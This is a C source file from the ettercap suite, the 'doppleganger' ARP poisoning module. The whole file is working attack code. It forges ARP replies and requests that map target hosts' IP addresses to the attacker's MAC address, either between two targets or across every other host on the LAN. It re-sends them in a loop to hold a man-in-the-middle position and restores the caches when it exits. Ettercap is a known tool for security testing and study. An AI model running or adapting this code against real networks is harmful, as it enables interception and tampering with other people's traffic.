/*
    ettercap -- doppleganger -- the ARP poisoner

    Copyright (C) 2001  ALoR <alor@users.sourceforge.net>, NaGA <crwm@freemail.it>

    This program is free software; you can redistribute it and/or modify
    it under the terms of the GNU General Public License as published by
    the Free Software Foundation; either version 2 of the License, or
    (at your option) any later version.

    This program is distributed in the hope that it will be useful,
    but WITHOUT ANY WARRANTY; without even the implied warranty of
    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
    GNU General Public License for more details.

    You should have received a copy of the GNU General Public License
    along with this program; if not, write to the Free Software
    Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.

    $Id: ec_doppleganger.c,v 1.1.1.1 2001/08/27 19:24:58 alor Exp $
*/

#include <stdio.h>
#include <sys/time.h>
#include <signal.h>
#include <sys/ioctl.h>
#include <string.h>
#include <unistd.h>
#include <stdlib.h>

#include "include/ec_main.h"
#include "include/ec_inet.h"
#include "include/ec_inet_forge.h"
#include "include/ec_inet_structures.h"
#include "include/ec_error.h"

#ifdef DEBUG
   #include "include/ec_debug.h"
#endif


// global data
u_char *buf1=NULL, *buf2=NULL;

char PoorMAC1[6];
char PoorMAC2[6];
char PoorIP1[17];
char PoorIP2[17];
u_long BroadIP, MyIP, NetMask;
int sock;

char MyMAC[6];       // my MAC address

// protos...

void Doppleganger_reARP(int dummy);
int Doppleganger_Run(char *iface, char *IP1, char *IP2, char *MAC1, char *MAC2);
int Doppleganger_Main(char *iface, char *IP1, char *IP2, char *MAC1, char *MAC2);

// ----------------------------

void Doppleganger_reARP(int dummy)        // turns back the ARP cache...
{
   int i, j;

#ifdef DEBUG
   Debug_msg("Doppleganger_reARP");
#endif

   // legal ARP reply :)
   for(j=0; j<5; j++)
   {
       if ( ((buf1 && !buf2) || (!buf1 && buf2)) && number_of_hosts_in_lan > 1 )
       {
         for(i = 1; i<number_of_hosts_in_lan; i++)
         {
            if (strcmp(Host_In_LAN[i].ip, PoorIP1) && strcmp(Host_In_LAN[i].ip, PoorIP2))   // don't send to the target
            {
               char SmartMAC1[6];
               char SmartMAC2[6];

               if (buf1)
               {
                  Inet_GetMACfromString(Host_In_LAN[i].mac, SmartMAC1);
                  Inet_Forge_ethernet( buf1, MyMAC, PoorMAC1, ETH_P_ARP );
                  Inet_Forge_arp( buf1+ETH_HEADER, (j%2) ? ARPOP_REQUEST : ARPOP_REPLY,
                                  SmartMAC1, inet_addr(Host_In_LAN[i].ip),
                                  PoorMAC1, inet_addr(PoorIP1) );
                  Inet_SendRawPacket(sock, buf1, ETH_HEADER + ARP_HEADER);
               }
               if (buf2)
               {
                  Inet_GetMACfromString(Host_In_LAN[i].mac, SmartMAC2);
                  Inet_Forge_ethernet( buf2, MyMAC, PoorMAC2, ETH_P_ARP );
                  Inet_Forge_arp( buf2+ETH_HEADER, (j%2) ? ARPOP_REQUEST : ARPOP_REPLY,
                                  SmartMAC2, inet_addr(Host_In_LAN[i].ip),
                                  PoorMAC2, inet_addr(PoorIP2) );
                  Inet_SendRawPacket(sock, buf2, ETH_HEADER + ARP_HEADER);
               }
            }
            usleep(Options.storm_delay);
//            #ifdef DEBUG
//               Debug_msg("Doppleganger_reARP -- rearping %d %d ", i, j);
//            #endif
         }
       }

       if (buf1) Inet_Forge_ethernet( buf1, MyMAC, PoorMAC2, ETH_P_ARP );
       if (buf2) Inet_Forge_ethernet( buf2, MyMAC, PoorMAC1, ETH_P_ARP );

       if (buf1)
           Inet_Forge_arp( buf1+ETH_HEADER, (j%2) ? ARPOP_REQUEST : ARPOP_REPLY,
                           PoorMAC1, inet_addr(PoorIP1),
                           PoorMAC2, inet_addr(PoorIP2) );
       if (buf2)
           Inet_Forge_arp( buf2+ETH_HEADER, (j%2) ? ARPOP_REQUEST : ARPOP_REPLY,
                           PoorMAC2, inet_addr(PoorIP2),
                           PoorMAC1, inet_addr(PoorIP1) );

       if (buf1) Inet_SendRawPacket(sock, buf1, ETH_HEADER + ARP_HEADER);
       usleep(Options.storm_delay);
       if (buf2) Inet_SendRawPacket(sock, buf2, ETH_HEADER + ARP_HEADER);

       sleep(1);
   }

#ifdef DEBUG
   Debug_msg("Doppleganger_reARP -- END");
#endif

   exit(0);
}



int Doppleganger_Main(char *iface, char *IP1, char *IP2, char *MAC1, char *MAC2)
{
   int MTU, replies=0;
   u_char BroadMAC[6]={0xff,0xff,0xff,0xff,0xff,0xff};

   strcpy(program_argv0, "dopplega");

   if (strcmp(MAC1,"")) buf1 = Inet_Forge_packet( ETH_HEADER + IP_HEADER + ICMP_HEADER );
   if (strcmp(MAC2,"")) buf2 = Inet_Forge_packet( ETH_HEADER + IP_HEADER + ICMP_HEADER );

   if (buf1) Inet_GetMACfromString(MAC1, PoorMAC1);
   else memcpy(PoorMAC1, BroadMAC, 6);

   if (buf2) Inet_GetMACfromString(MAC2, PoorMAC2);
   else memcpy(PoorMAC2, BroadMAC, 6);

   if (buf1) strncpy(PoorIP1,IP1, 17);
   else strncpy(PoorIP1,"69.69.69.69", 11);

   if (buf2) strncpy(PoorIP2,IP2, 17);
   else strncpy(PoorIP2,"69.69.69.69", 11);

   sock = Inet_OpenRawSock(iface);

   Inet_GetIfaceInfo(iface, &MTU, MyMAC, &MyIP, &NetMask);

   BroadIP=(MyIP&NetMask)|(~NetMask);

   // Force IP in ARP cache
   if (buf1 && buf2)
   {
       Inet_Forge_ethernet( buf1, MyMAC, PoorMAC2, ETH_P_IP );
       Inet_Forge_ethernet( buf2, MyMAC, PoorMAC1, ETH_P_IP );

       Inet_Forge_ip( buf1 + ETH_HEADER, inet_addr(PoorIP1), inet_addr(PoorIP2),
                      ICMP_HEADER, 0xe77e, 0, IPPROTO_ICMP );
       Inet_Forge_ip( buf2 + ETH_HEADER, inet_addr(PoorIP2), inet_addr(PoorIP1),
                      ICMP_HEADER, 0xe77e, 0, IPPROTO_ICMP );

       Inet_Forge_icmp( buf1 + ETH_HEADER + IP_HEADER, ICMP_ECHO, 0, NULL, 0 );
       Inet_Forge_icmp( buf2 + ETH_HEADER + IP_HEADER, ICMP_ECHO, 0, NULL, 0 );

       Inet_SendRawPacket(sock, buf1, ETH_HEADER + IP_HEADER + ICMP_HEADER);
       Inet_SendRawPacket(sock, buf2, ETH_HEADER + IP_HEADER + ICMP_HEADER);
   }
   else // We don't need other conditions
   {
      int i;
      if (number_of_hosts_in_lan<=1)
      {
         if (buf1)
         {
             Inet_Forge_ethernet( buf1, MyMAC, BroadMAC, ETH_P_IP );
                  Inet_Forge_ip( buf1 + ETH_HEADER, inet_addr(PoorIP1), BroadIP,
                                 ICMP_HEADER, 0xe77e, 0, IPPROTO_ICMP );
                  Inet_Forge_icmp( buf1 + ETH_HEADER + IP_HEADER, ICMP_ECHO, 0, NULL, 0 );
                  Inet_SendRawPacket(sock, buf1, ETH_HEADER + IP_HEADER + ICMP_HEADER);
         }
         else
         {
             Inet_Forge_ethernet( buf2, MyMAC, BroadMAC, ETH_P_IP );
                  Inet_Forge_ip( buf2 + ETH_HEADER, inet_addr(PoorIP2), BroadIP,
                                 ICMP_HEADER, 0xe77e, 0, IPPROTO_ICMP );
                  Inet_Forge_icmp( buf2 + ETH_HEADER + IP_HEADER, ICMP_ECHO, 0, NULL, 0 );
                  Inet_SendRawPacket(sock, buf2, ETH_HEADER + IP_HEADER + ICMP_HEADER);
         }
      }

      for(i = 1; i<number_of_hosts_in_lan; i++)
      {
         usleep(Options.storm_delay);

         if (strcmp(Host_In_LAN[i].ip, IP1) && strcmp(Host_In_LAN[i].ip, IP2))   // don't send to the target
         {
            char SmartMAC1[6];
            char SmartMAC2[6];

            if (buf1)
            {
               Inet_GetMACfromString(Host_In_LAN[i].mac, SmartMAC2);
               Inet_Forge_ethernet( buf1, MyMAC, SmartMAC2, ETH_P_IP );
               Inet_Forge_ip( buf1 + ETH_HEADER, inet_addr(PoorIP1), inet_addr(Host_In_LAN[i].ip),
                   ICMP_HEADER, 0xe77e, 0, IPPROTO_ICMP );
               Inet_Forge_icmp( buf1 + ETH_HEADER + IP_HEADER, ICMP_ECHO, 0, NULL, 0 );
               Inet_SendRawPacket(sock, buf1, ETH_HEADER + IP_HEADER + ICMP_HEADER);
               usleep(Options.storm_delay);
               Inet_Forge_ethernet( buf1, MyMAC, PoorMAC1, ETH_P_IP );
               Inet_Forge_ip( buf1 + ETH_HEADER, inet_addr(Host_In_LAN[i].ip), inet_addr(PoorIP1),
                   ICMP_HEADER, 0xe77e, 0, IPPROTO_ICMP );
               Inet_Forge_icmp( buf1 + ETH_HEADER + IP_HEADER, ICMP_ECHO, 0, NULL, 0 );
               Inet_SendRawPacket(sock, buf1, ETH_HEADER + IP_HEADER + ICMP_HEADER);
            }
            if (buf2)
            {
               Inet_GetMACfromString(Host_In_LAN[i].mac, SmartMAC1);
               Inet_Forge_ethernet( buf2, MyMAC, SmartMAC1, ETH_P_IP );
               Inet_Forge_ip( buf2 + ETH_HEADER, inet_addr(PoorIP2), inet_addr(Host_In_LAN[i].ip),
                   ICMP_HEADER, 0xe77e, 0, IPPROTO_ICMP );
               Inet_Forge_icmp( buf2 + ETH_HEADER + IP_HEADER, ICMP_ECHO, 0, NULL, 0 );
               Inet_SendRawPacket(sock, buf2, ETH_HEADER + IP_HEADER + ICMP_HEADER);
               usleep(Options.storm_delay);
               Inet_Forge_ethernet( buf2, MyMAC, PoorMAC2, ETH_P_IP );
               Inet_Forge_ip( buf2 + ETH_HEADER, inet_addr(Host_In_LAN[i].ip), inet_addr(PoorIP2),
                   ICMP_HEADER, 0xe77e, 0, IPPROTO_ICMP );
               Inet_Forge_icmp( buf2 + ETH_HEADER + IP_HEADER, ICMP_ECHO, 0, NULL, 0 );
               Inet_SendRawPacket(sock, buf2, ETH_HEADER + IP_HEADER + ICMP_HEADER);
            }
         }
      }
   }

   signal(SIGINT, Doppleganger_reARP);
   signal(SIGTERM, Doppleganger_reARP);

   if ( ((buf1 && !buf2) || (!buf1 && buf2)) && number_of_hosts_in_lan > 1 )  // smart ARP
   {
      #ifdef DEBUG
         Debug_msg("Doppleganger_Run -- SMART ARPing... [delay = %d]", Options.delay);
      #endif
      loop
      {
         int i;

         if (getppid() == 1) Doppleganger_reARP(SIGTERM);

         for(i = 1; i<number_of_hosts_in_lan; i++)
         {
            usleep(Options.storm_delay);
            if (strcmp(Host_In_LAN[i].ip, IP1) && strcmp(Host_In_LAN[i].ip, IP2))   // don't send to the target
            {
               char SmartMAC1[6];
               char SmartMAC2[6];

               if (buf1)
               {
                  Inet_GetMACfromString(Host_In_LAN[i].mac, SmartMAC2);
                  Inet_Forge_ethernet( buf1, MyMAC, SmartMAC2, ETH_P_ARP );
                  Inet_Forge_arp( buf1+ETH_HEADER, (replies%2) ? ARPOP_REQUEST : ARPOP_REPLY,
                                  MyMAC, inet_addr(PoorIP1),
                                  SmartMAC2, inet_addr(Host_In_LAN[i].ip) );
                  Inet_SendRawPacket(sock, buf1, ETH_HEADER + ARP_HEADER);
                  usleep(Options.storm_delay);
                  Inet_Forge_ethernet( buf1, MyMAC, PoorMAC1, ETH_P_ARP );
                  Inet_Forge_arp( buf1+ETH_HEADER, (replies%2) ? ARPOP_REQUEST : ARPOP_REPLY,
                                  MyMAC, inet_addr(Host_In_LAN[i].ip),
                                  PoorMAC1, inet_addr(PoorIP1) );
                  Inet_SendRawPacket(sock, buf1, ETH_HEADER + ARP_HEADER);
               }
               if (buf2)
               {
                  Inet_GetMACfromString(Host_In_LAN[i].mac, SmartMAC1);
                  Inet_Forge_ethernet( buf2, MyMAC, SmartMAC1, ETH_P_ARP );
                  Inet_Forge_arp( buf2+ETH_HEADER, (replies%2) ? ARPOP_REQUEST : ARPOP_REPLY,
                                  MyMAC, inet_addr(PoorIP2),
                                  SmartMAC1, inet_addr(Host_In_LAN[i].ip) );
                  Inet_SendRawPacket(sock, buf2, ETH_HEADER + ARP_HEADER);
                  usleep(Options.storm_delay);
                  Inet_Forge_ethernet( buf2, MyMAC, PoorMAC2, ETH_P_ARP );
                  Inet_Forge_arp( buf2+ETH_HEADER, (replies%2) ? ARPOP_REQUEST : ARPOP_REPLY,
                                  MyMAC, inet_addr(Host_In_LAN[i].ip),
                                  PoorMAC2, inet_addr(PoorIP2) );
                  Inet_SendRawPacket(sock, buf2, ETH_HEADER + ARP_HEADER);
               }
            }
         }

         if (replies<4)
            sleep(2);
         else
            sleep(Options.delay);

         replies++;
      }
   }
   else
   {
      #ifdef DEBUG
         if ((buf1 && !buf2) || (!buf1 && buf2))
            Debug_msg("Doppleganger_Run -- PUBLIC ARPing... [delay = %d]", Options.delay);
         else
            Debug_msg("Doppleganger_Run -- ARP POISONing... [delay = %d]", Options.delay);
      #endif

      if (buf1)
      {
          Inet_Forge_ethernet( buf1, MyMAC, PoorMAC2, ETH_P_ARP );
          Inet_Forge_arp( buf1+ETH_HEADER, (replies%2) ? ARPOP_REQUEST : ARPOP_REPLY,
                          MyMAC, inet_addr(PoorIP1),
                          PoorMAC2, inet_addr(PoorIP2) );
      }

      if (buf2)
      {
          Inet_Forge_ethernet( buf2, MyMAC, PoorMAC1, ETH_P_ARP );
          Inet_Forge_arp( buf2+ETH_HEADER, (replies%2) ? ARPOP_REQUEST : ARPOP_REPLY,
                          MyMAC, inet_addr(PoorIP2),
                          PoorMAC1, inet_addr(PoorIP1) );
      }

      loop
      {
         if (getppid() == 1) Doppleganger_reARP(SIGTERM);

         if (buf1) Inet_SendRawPacket(sock, buf1, ETH_HEADER + ARP_HEADER);
         usleep(Options.storm_delay);
         if (buf2) Inet_SendRawPacket(sock, buf2, ETH_HEADER + ARP_HEADER);

         if (replies<4)
             sleep(2);
         else
             sleep(Options.delay);
         replies++;
      }
   }
   return(0);
}



int Doppleganger_Run(char *iface, char *IP1, char *IP2, char *MAC1, char *MAC2)
{
   int Dopple_pid;

#ifdef DEBUG
       Debug_msg("Doppleganger_Run -- [%s] [%s] [%s] [%s]", IP1, IP2, MAC1, MAC2);
#endif

   if (!(Dopple_pid = fork()))
      Doppleganger_Main(iface, IP1, IP2, MAC1, MAC2);
   else
      return Dopple_pid;

   return 0;
}

/* EOF */
